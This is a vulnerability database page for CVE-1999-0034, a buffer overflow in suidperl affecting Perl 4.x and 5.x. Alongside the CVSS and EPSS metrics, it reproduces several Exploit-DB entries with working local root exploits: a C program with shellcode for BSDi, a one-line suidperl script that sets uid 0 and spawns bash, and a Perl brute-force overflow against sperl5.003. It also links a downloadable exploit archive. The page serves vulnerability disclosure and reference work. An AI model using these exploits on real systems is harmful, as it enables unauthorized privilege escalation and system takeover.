CVE-1999-0034 : Detail

CVE-1999-0034

0.05%V3
Local
1999-09-29
02h00 +00:00
2024-08-01
16h27 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in suidperl (sperl), Perl 4.x and 5.x.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 200

Publication date : 2000-11-20 23h00 +00:00
Author : vade79
EDB Verified : Yes

/* (BSDi)suidperl[] buffer overflow, by v9[[email protected]]. this is that old buffer overflow in suidperl, but i never saw any version of it for BSDi. so, here it is. this gives euid=0. (BSDi/3.0) */ #define PATH "/usr/bin/suidperl" /* path to suidperl on BSDi/3.0. */ #define DEFAULT_OFFSET -5000 /* general offset, a lot of room. */ static char exec[]= "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c" /* 14 characters. */ "\x89\x76\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff" /* 14 characters. */ "\xff\xff\xff\x07\xff\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e" /* 14 characters. */ "\x2f\x73\x68\x00"; /* 4 characters; 46 characters total. */ long pointer(void){__asm__("movl %esp,%eax");} int main(int argc,char **argv){ char eip[2048],buf[4096]; int i,offset; long ret; printf("[ (BSDi)suidperl[]: buffer overflow, by: v9[[email protected]]. ]\n"); if(argc>1){offset=atoi(argv[1]);} else{offset=DEFAULT_OFFSET;} ret=(pointer()-offset); eip[0]=0x01; for(i=1;i<2048;i+=4){*(long *)&eip[i]=ret;} eip[1248]=0x0; for(i=0;i<(4096-strlen(exec)-strlen(eip));i++){*(buf+i)=0x90;} memcpy(buf+i,exec,strlen(exec)); memcpy(buf,"EXEC=",5);putenv(buf); printf("*** [data]: return address: 0x%lx, offset: %d.\n",ret,offset); if(execlp(PATH,"suidperl",eip,0)){ printf("*** [error]: could not execute %s successfully.\n",PATH); exit(1); } } // milw0rm.com [2000-11-21]
Exploit Database EDB-ID : 320

Publication date : 1996-05-31 22h00 +00:00
Author : Jon Lewis
EDB Verified : Yes

#!/usr/bin/suidperl -U $ENV{PATH}="/bin:/usr/bin"; $>=0;$<=0; exec("/bin/bash"); # milw0rm.com [1996-06-01]
Exploit Database EDB-ID : 19546

Publication date : 1997-04-16 22h00 +00:00
Author : Pavel Kankovsky
EDB Verified : Yes

source: https://www.securityfocus.com/bid/708/info Several buffer overflows were found in the Perl helper application 'suidperl' or 'sperl'. When this program is installed setuid root the overflows may lead to a local root compromise. #!/usr/bin/perl # yes, this suidperl exploit is in perl, isn't it wonderful? :) $| = 1; $shellcode = "\x90" x 512 . # nops "\xbc\xf0\xff\xff\xbf" . # movl $0xbffffff0,%esp # "standard shellcode" by Aleph One "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" . "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" . "\x80\xe8\xdc\xff\xff\xff/bin/sh"; # start and end of .data # adjust this using /proc/*/maps $databot = 0x080a2000; $datatop = 0x080ab000; # trial and error loop $address = $databot + 4; while ($address < $datatop) { $smash_me = $shellcode . ('A' x (2052 - length($shellcode))) . (pack("l", $address) x 1000) . ('B' x 1000); $pid = fork(); if (!$pid) { exec('/usr/bin/sperl5.003', $smash_me); } else { wait; if ($? == 0) { printf("THE MAGIC ADDRESS WAS %08x\n", $address); exit; } } $address += 128; }
Exploit Database EDB-ID : 19547

Publication date : 1997-04-16 22h00 +00:00
Author : Willy Tarreau
EDB Verified : Yes

source: https://www.securityfocus.com/bid/708/info Several buffer overflows were found in the Perl helper application 'suidperl' or 'sperl'. When this program is installed setuid root the overflows may lead to a local root compromise. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19547.tgz

Products Mentioned

Configuraton 0

Larry_wall>>Perl >> Version 5.3

    Sgi>>Freeware >> Version 1.0

      Sgi>>Freeware >> Version 2.0

        Configuraton 0

        Bsdi>>Bsd_os >> Version 2.1

        Bsdi>>Bsd_os >> Version 3.0

        Redhat>>Linux >> Version 4.0

        Redhat>>Linux >> Version 4.1

        Redhat>>Linux >> Version 4.2

        References